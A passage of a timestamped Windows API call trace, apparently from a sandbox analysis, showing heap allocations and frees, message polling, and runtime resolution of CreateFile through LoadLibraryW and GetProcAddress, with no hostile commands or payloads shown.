lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.850] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0178.850] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.850] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.850] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0178.851] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0178.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.854] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.856] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8d0 [0178.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.857] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0178.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd8d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.857] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: 